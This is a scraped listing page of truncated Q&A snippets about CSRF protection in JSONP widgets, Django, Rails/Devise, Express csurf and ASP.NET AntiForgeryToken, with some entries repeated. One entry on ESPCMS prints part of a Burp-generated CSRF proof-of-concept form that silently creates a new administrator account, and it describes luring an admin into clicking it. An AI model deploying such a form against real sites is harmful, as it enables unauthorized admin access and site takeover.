csrf

How to reliably secure public JSONP requests?

喜你入骨 提交于 2019-12-31 01:33:51
问题 I'm trying to find if there's a good way to prevent CSRF on a javascript widget embedded on customers' websites. The widget would enable end users to make requests against our customers' accounts via JSONP to a a PHP server which proxies those requests to our (non-public) API. To this point, I haven't come up with a surefire way to ensure all requests are coming from only our customers' websites. Some ideas I've had: Tokens generated on the server side and passed back along with each

Django returns 403 error on POST request with Fetch

北战南征 提交于 2019-12-30 13:20:23
问题 I have a graphql server implemented using graphene-django. I can make queries to it using jquery like this: function allIngredients() { return 'query{allProducts{edges{node{name}}}}' } var query = allIngredients(); $.ajaxSetup({ data: {csrfmiddlewaretoken: '{{ csrf_token }}' }, }); $.post("/graphql", {query: query}, function(response) { console.log(response); }) However, when I try this call with Fetch, I get a 403, because of the CORS issue. I solved the same problem in jQuery by adding

rails csrf validation in firefox

拈花ヽ惹草 提交于 2019-12-30 10:28:05
问题 I have a site created with Rails using Devise for authentication. It works perfectly fine in Chrome, but in Firefox I cannot log in. All I can see is a message in log: WARNING: Can't verify CSRF token authenticity And the login screen comes back without any error messages. Can someone give me a hint where to look after what is happening? 回答1: I had exactly the same problem. Login was working in Chrome and not in FF. The problem was not related to CSRF since I commented out protect_from

rails csrf validation in firefox

前提是你 提交于 2019-12-30 10:28:04
问题 I have a site created with Rails using Devise for authentication. It works perfectly fine in Chrome, but in Firefox I cannot log in. All I can see is a message in log: WARNING: Can't verify CSRF token authenticity And the login screen comes back without any error messages. Can someone give me a hint where to look after what is happening? 回答1: I had exactly the same problem. Login was working in Chrome and not in FF. The problem was not related to CSRF since I commented out protect_from

Error: misconfigured csrf - Express JS 4

☆樱花仙子☆ 提交于 2019-12-30 08:02:08
问题 I am trying to enable the csrf module of Express 4 in an existing application. I have added the following code: var csrf = require('csurf') ... app.use(csrf()); I have started my application and I get: Error: misconfigured csrf and a stack trace. Nothing else. I have checked the documentation, but it is unclear. Can someone help? What is the minimum configuration required to use this module? 回答1: I have found the solution. The call to app.use(csrf()) must be set after app.use(cookieParser())

Error: misconfigured csrf - Express JS 4

半城伤御伤魂 提交于 2019-12-30 08:01:46
问题 I am trying to enable the csrf module of Express 4 in an existing application. I have added the following code: var csrf = require('csurf') ... app.use(csrf()); I have started my application and I get: Error: misconfigured csrf and a stack trace. Nothing else. I have checked the documentation, but it is unclear. Can someone help? What is the minimum configuration required to use this module? 回答1: I have found the solution. The call to app.use(csrf()) must be set after app.use(cookieParser())

AntiForgeryToken changes per request

元气小坏坏 提交于 2019-12-30 06:19:27
问题 I am using the AntiForgeryToken helper method. From what I understand about the AntiForgeryToken is that it is session base, so that each user has the same token but another user will have a different token (provided that you use the same salts for all of the forms). My "problem" is that AntiForgeryToken is generating different tokens for the same user with the same salt. For example ... Contoller public ActionResult Test() { return View(); } View @using (Html.BeginForm()) { @Html

Django CSRF cookie HttpOnly

≯℡__Kan透↙ 提交于 2019-12-30 05:57:07
问题 Is it possible to set the django csrf cookie to be http-only? Alike to SESSION_COOKIE_HTTPONLY with session cookie, but for the csrf one? 回答1: A new setting, CSRF_COOKIE_HTTPONLY, is available in Django 1.6+. 回答2: For Django1.6+, check the accepted answer. For Django1.5 and prev, there is not setting option for this. You could override the process_response() method of django.middleware.csrf.CsrfViewMiddleware and using the customized one instead of CsrfViewMiddleware in MIDDLEWARE_CLASSES

ESPCMS的CSRF添加管理员账号

时光怂恿深爱的人放手 提交于 2019-12-30 05:20:25
ESPCMS的CSRF添加管理员账号 前言 这里开始的思路是先注入进去 然后getshell 但是不关CSRF什么事 换思路 看了一下群消息 大哥发了一个视频 后台名称admin admin123 0X01 CSRF攻击之旅 进后台添加管理 这里 为了试验环境 需要把你加的管理先删除了 然后POST抓包 添加用户的这里构造CSRF 然后社工管理员 管理点击后 成功 exp <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://www.espcms.com/adminsoft/index.php?archive=management&action=managesava" method="POST"> <input type="hidden" name="inputclass" value="add" /> <input type="hidden" name="tab" value="true" /> <input type="hidden" name="username" value="zhong" /> <input type="hidden" name="password" value="zhongzhong" /> <input type=

Rails 3.1 - CSRF ignored?

℡╲_俬逩灬. 提交于 2019-12-30 00:38:11
问题 here my problem, I've got a rails 3.1 app and I'm trying to make an ajax request but I get the warning message "WARNING: Can't verify CSRF token authenticity"… Inside my layout I've got the helper method "csrf_method_tag" , and I add the following javascript code (don't know if it's really required or not): $.ajaxSetup({ beforeSend: function(xhr) { xhr.setRequestHeader('X-CSRF-Token', $('meta[name="csrf-token"]').attr('content')); } }); My Gemfile contains the gem jquery-rails (>= 1.0.12) and
订阅 csrf